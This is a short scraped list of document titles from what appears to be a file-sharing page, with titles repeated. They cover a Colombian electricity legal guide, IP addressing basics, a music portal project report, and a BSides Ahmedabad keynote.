GUIA_LEGAL_CHAPTER-9_COLOMBIAN ELECTRICITY (1).pdfGUIA_LEGAL_CHAPTER-9_COLOMBIAN ELECTRICITY (1).pdf
GUIA_LEGAL_CHAPTER-9_COLOMBIAN ELECTRICITY (1).pdf
 
Introduction to IP address concept - Computer Networking
Introduction to IP address concept - Computer NetworkingIntroduction to IP address concept - Computer Networking
Introduction to IP address concept - Computer Networking
 
Online music portal management system project report.pdf
Online music portal management system project report.pdfOnline music portal management system project report.pdf
Online music portal management system project report.pdf
 

Frans Rosén Keynote at BSides Ahmedabad